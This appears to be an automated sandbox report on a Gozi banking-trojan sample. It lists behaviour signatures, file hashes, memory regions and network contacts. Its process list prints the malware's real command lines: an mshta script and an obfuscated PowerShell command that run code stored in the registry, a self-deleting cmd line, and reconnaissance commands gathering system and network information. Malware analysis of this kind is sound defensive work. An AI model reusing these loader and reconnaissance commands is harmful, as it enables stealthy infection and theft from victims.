Analysis Overview
SHA256
1b0194d033b65fbc9dc1955c10395fff4d0943bc0e1e54a92b7c36119a7c051f
Threat Level: Known bad
The file t.tgz was found to be: Known bad.
Malicious Activity Summary
Gozi
Blocklisted process makes network request
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Runs net.exe
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious behavior: CmdExeWriteProcessMemorySpam
Runs ping.exe
Discovers systems in the same network
Gathers system information
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-03-08 16:16
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2023-03-08 16:15
Reported
2023-03-08 16:18
Platform
win10v2004-20230220-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
Gozi
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4208 set thread context of 804 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 804 set thread context of 3772 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 804 set thread context of 3440 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 804 set thread context of 1344 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\cmd.exe |
| PID 804 set thread context of 4112 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 804 set thread context of 2232 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1344 set thread context of 3184 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE |
| PID 804 set thread context of 4844 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Igxu='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Igxu).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EB212225-4E4E-5501-B04F-6259E4F3B69D\\\BookVirtual'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxvvjkglf -value gp; new-alias -name sabpvj -value iex; sabpvj ([System.Text.Encoding]::ASCII.GetString((jxvvjkglf "HKCU:Software\AppDataLow\Software\Microsoft\EB212225-4E4E-5501-B04F-6259E4F3B69D").FolderProcess))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BD4.tmp" "c:\Users\Admin\AppData\Local\Temp\q0qstetp\CSC7182A83187C14DADB55CBFCD9FAEFCE.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CCE.tmp" "c:\Users\Admin\AppData\Local\Temp\wir3sxsr\CSC26E5B873B3C14D448ECCD3F23066F5F6.TMP"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll"
C:\Windows\system32\PING.EXE
ping localhost -n 5
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\EBE4.bin1"
C:\Windows\system32\net.exe
net view
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.110.152.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.176.139.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.104.205.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.104.205.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trackingg-protectioon.cdn4.mozilla.net | udp |
| US | 8.8.8.8:53 | 97.238.32.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 209.197.3.8:80 | tcp | |
| US | 35.190.80.1:443 | tcp | |
| GB | 185.158.250.165:80 | 185.158.250.165 | tcp |
| US | 8.8.8.8:53 | 164.2.77.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.250.158.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | trackingg-protectioon.cdn4.mozilla.net | udp |
Files
memory/4324-133-0x00000000027A0000-0x00000000037A0000-memory.dmp
memory/4324-134-0x0000000015570000-0x0000000015576000-memory.dmp
memory/4324-135-0x00000000027A0000-0x00000000037A0000-memory.dmp
memory/4324-136-0x0000000015BE0000-0x0000000015BED000-memory.dmp
memory/4324-139-0x00000000027A0000-0x00000000037A0000-memory.dmp
memory/4364-152-0x00000276D6D60000-0x00000276D7217000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmdq1qgp.ble.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4208-153-0x000001ACF0C00000-0x000001ACF0C22000-memory.dmp
memory/4208-163-0x000001ACF0B50000-0x000001ACF0B60000-memory.dmp
memory/4208-164-0x000001ACF0B50000-0x000001ACF0B60000-memory.dmp
memory/4208-165-0x000001ACF0B50000-0x000001ACF0B60000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.cmdline
| MD5 | 651b587b5ceb1707927636685e4ed93d |
| SHA1 | c5fa9322420b56de83e10579591f7afa993f2c63 |
| SHA256 | bbfed94d61c6f521f827e33e4a8039d1b9fa389e452dc89577f9895609ecac85 |
| SHA512 | a5829cacf2496ffafa76c98628367dfea3ef49fad34d544d89206cdd26ed2154cb509fca46d1f9fb98e4633e25c24b11c94935b6efcc8be160c1436273ac8075 |
\??\c:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.0.cs
| MD5 | bd49a7184d9437c2fc1f479f064cd629 |
| SHA1 | cbc187f4d9c71eea6ceef8b6f6584456df0ed97e |
| SHA256 | d9193d05e3439096314ed9a7b47a04e7afb4eefe34601ad3f21afe7db216742a |
| SHA512 | 2655a3043c23ed39dcb88615084c5897b8ba7c36a19d52d650c6122e7bcfab7056f52c0f7a89131db8972b9285e15e2cbddd4216129df02855ce0ef87da8cce3 |
\??\c:\Users\Admin\AppData\Local\Temp\q0qstetp\CSC7182A83187C14DADB55CBFCD9FAEFCE.TMP
| MD5 | d6d9d005784a43d7eae3543c940d7d35 |
| SHA1 | 6cabd66e35da5e7f8a84bfdf279758088c042ba6 |
| SHA256 | 7a7e47da28fa5ffd1bfc22ca42900708d00920bd8b1eb6c52fcf4998cccceadb |
| SHA512 | 7a4829719e015beb891727113e730b462a53017330bdbe47f430486183d87eed63c09130903aed4aec7c256df03542cf61b7f4387ae0980de24459ea501e2696 |
C:\Users\Admin\AppData\Local\Temp\RES6BD4.tmp
| MD5 | 2d2bf756ae4c3bcb58f64fdb0b1a86b3 |
| SHA1 | d3bed8129c1c4f63a6151c4acfbe27b3d4011725 |
| SHA256 | de7f99a3727649978aa58ae043c159f2ef832f3e57e584f0d2441c8d564eba82 |
| SHA512 | 06fd5e270f66322da9dd7eb964cf02974389eae387e991d076dfa86824ecad4443bf185abe52ef4f9a6793f99c95bc5f438c6ae9599da970954d59e6a820012d |
C:\Users\Admin\AppData\Local\Temp\q0qstetp\q0qstetp.dll
| MD5 | 6f8e06d1ad44febd0d4dfe4a99c5f05e |
| SHA1 | 5f9c158171904a232caf803d24fa4fa7015a4fde |
| SHA256 | 334ac4dae1c1a10e99c62e512bcbeeb106464f174dcad24c92946da84f5c6048 |
| SHA512 | 7042f7859cbc236d23b61605fcdae55e0ccab75e644719e6f8d4e23a2e0f5bc78377e88d0e820b0b66e45c066eb2b965abe0bdef2c8a819c4844946dce720cb7 |
\??\c:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.cmdline
| MD5 | 7b2ac1280e3cedc1bd1cb9f868ff2e49 |
| SHA1 | 00da23403eb0007251f2fe79e231b2bfb42dd9cc |
| SHA256 | 3df138466db767f371e2fbc893a597a02cbeecdd2c19657d5a87b7732cd4ee1f |
| SHA512 | ea336463ad7e705803c7526a73849e2826e079b703f83f19dab84a9fecb5c4b2d5819745fabdaba90c99155135898eceaa65dac32f7399b327a523afb4f7a150 |
\??\c:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.0.cs
| MD5 | f940d18acdc4088474574ab02034b84d |
| SHA1 | b4a132a7603699cb6faf9fd4057f14d18ed4b83d |
| SHA256 | 01b20e366874c9f04c18819e9076c68e80ae0bcb8354f7b5ae72e3d9f38e1aeb |
| SHA512 | 4d2f49205ab6012e0b5e3a5f12a514550cdbd556b3567626286b26869120ac6ccf3abc08fdd3e975a41c2bac0eddefd03fa262ecc52de03e959c25791432831a |
\??\c:\Users\Admin\AppData\Local\Temp\wir3sxsr\CSC26E5B873B3C14D448ECCD3F23066F5F6.TMP
| MD5 | a0dd5ccd9606e01c3a69616112a4a084 |
| SHA1 | 8921aa75327eaa7f181370a3a2c018281e1a92fc |
| SHA256 | 2ca4f823f27336c0341cc715e839b6ce9addaa579666b8f89c5be5e5e4c54c52 |
| SHA512 | 10048f9c972bcb8abf697382fc3881bf11f4f8e4df5c5fd7fdaccda0506726b1877d35653ec934355e7c211e242eeceab709caaaf7dbd06b7f97fd185d406f07 |
C:\Users\Admin\AppData\Local\Temp\RES6CCE.tmp
| MD5 | e3314aef6101867f045040474361d994 |
| SHA1 | 7fee4426539cc14088a21db48cdd1603411989de |
| SHA256 | 2b5039c4d44dcc7758e6e9d783aa5d0fb038224c135089b3eb80bd82789cf987 |
| SHA512 | db4e9f69e8641184e86885dc9ca3eb0d82bf2d259fea95ea2762949be4d333552c29031193a075ab62879faef8ec6e405399b19ed00ef6bbbc29580c32937b06 |
C:\Users\Admin\AppData\Local\Temp\wir3sxsr\wir3sxsr.dll
| MD5 | c8a97f1dc1f5f7d6a4c06d85b571fb6a |
| SHA1 | df4baab1acfb310fc6902eaf21a10190276911e6 |
| SHA256 | ca3a662c0fcaf789658a69bd384676722dedb108e9b6ca54db9ad416151aaa99 |
| SHA512 | 185514736165cb836059519f2624bd7dabbb4e608b8a5bcea81f14b6646804f4bd3283bc21fa2445c34c2cc3d067bbc821b0bfdc6244fbfe12f61599b7026be6 |
memory/804-193-0x00000000080F0000-0x0000000008193000-memory.dmp
memory/4208-199-0x000001ACF0FA0000-0x000001ACF0FDC000-memory.dmp
memory/3772-204-0x0000028FC9E40000-0x0000028FC9EE3000-memory.dmp
memory/1344-211-0x0000024AE4200000-0x0000024AE42A3000-memory.dmp
memory/3440-210-0x0000024550AD0000-0x0000024550B73000-memory.dmp
memory/4112-216-0x000001A2A7FA0000-0x000001A2A8043000-memory.dmp
memory/3772-226-0x0000028FC9840000-0x0000028FC9841000-memory.dmp
memory/2232-223-0x0000016F03410000-0x0000016F034B3000-memory.dmp
memory/3772-228-0x0000028FC9E40000-0x0000028FC9EE3000-memory.dmp
memory/3440-230-0x0000024550120000-0x0000024550121000-memory.dmp
memory/3440-232-0x0000024550AD0000-0x0000024550B73000-memory.dmp
memory/804-233-0x0000000000AC0000-0x0000000000AC1000-memory.dmp
memory/804-234-0x00000000080F0000-0x0000000008193000-memory.dmp
memory/1344-235-0x0000024AE4080000-0x0000024AE4081000-memory.dmp
memory/1344-236-0x0000024AE4200000-0x0000024AE42A3000-memory.dmp
memory/4112-237-0x000001A2A5DB0000-0x000001A2A5DB1000-memory.dmp
memory/4112-238-0x000001A2A7FA0000-0x000001A2A8043000-memory.dmp
memory/2232-239-0x0000016F03200000-0x0000016F03201000-memory.dmp
memory/2232-242-0x0000016F03410000-0x0000016F034B3000-memory.dmp
memory/3184-241-0x000001F225DB0000-0x000001F225E53000-memory.dmp
memory/3184-246-0x000001F225B70000-0x000001F225B71000-memory.dmp
memory/3184-247-0x000001F225DB0000-0x000001F225E53000-memory.dmp
memory/1344-248-0x0000024AE4200000-0x0000024AE42A3000-memory.dmp
memory/4844-250-0x0000000000B60000-0x0000000000BF8000-memory.dmp
memory/4844-253-0x0000000000B60000-0x0000000000BF8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\EBE4.bin1
| MD5 | 1d0b80729108e13e765fa8b5dbc325b0 |
| SHA1 | 155a3f53b166d45c70f4444c2603b6ceb95d4f9e |
| SHA256 | 4078dfa5ba175d50a27b6f7d1eb134da661cf559038b601986bc27beddb3a59b |
| SHA512 | f3adc98b8a9288f80bf023cb691cf4d8e78fa7fa5e6e22eced1c6dcec9ea0e842fef609a06c92d2cd3d7c572e60aaaa4bb0a5821ab987b53f8ac68561b240b94 |
C:\Users\Admin\AppData\Local\Temp\EBE4.bin1
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/804-257-0x00000000080F0000-0x0000000008193000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\EBE4.bin1
| MD5 | 1b8cd7fcdf04c98cd645bef0eefb2cf4 |
| SHA1 | cdc096cf188ba6240896cb15c64008446e1bc26e |
| SHA256 | 4d5c6b07f98f91df9f3c52f77ab336ad3c58ed2e58ae70910e386e2dafc1af0b |
| SHA512 | e43b8da32f4f5c09e0ce7644fd56bc5864cb93b5d195ffe03505a536c784877c0421ffffeea644fb49518ddb76b95684803018af2eb37d3da1ce766ec45d3a49 |
C:\Users\Admin\AppData\Local\Temp\EBE4.bin1
| MD5 | 1b8cd7fcdf04c98cd645bef0eefb2cf4 |
| SHA1 | cdc096cf188ba6240896cb15c64008446e1bc26e |
| SHA256 | 4d5c6b07f98f91df9f3c52f77ab336ad3c58ed2e58ae70910e386e2dafc1af0b |
| SHA512 | e43b8da32f4f5c09e0ce7644fd56bc5864cb93b5d195ffe03505a536c784877c0421ffffeea644fb49518ddb76b95684803018af2eb37d3da1ce766ec45d3a49 |
Analysis: behavioral1
Detonation Overview
Submitted
2023-03-08 16:15
Reported
2023-03-08 16:17
Platform
win7-20230220-en
Max time kernel
70s
Max time network
35s
Command Line
Signatures
Gozi
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2020 wrote to memory of 2012 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2020 wrote to memory of 2012 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2020 wrote to memory of 2012 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2020 wrote to memory of 2012 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2020 wrote to memory of 2012 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2020 wrote to memory of 2012 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2020 wrote to memory of 2012 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\63338a1c62335e2478ca4592fde772ead9637ec24ebd389f92a620c7b2651d2e.dll,#1
Network
Files
memory/2012-54-0x0000000001F40000-0x0000000002F40000-memory.dmp
memory/2012-55-0x0000000000210000-0x0000000000216000-memory.dmp
memory/2012-56-0x0000000001F40000-0x0000000002F40000-memory.dmp
memory/2012-57-0x0000000001F40000-0x0000000002F40000-memory.dmp
memory/2012-59-0x0000000001F40000-0x0000000002F40000-memory.dmp
memory/2012-60-0x0000000001F40000-0x0000000002F40000-memory.dmp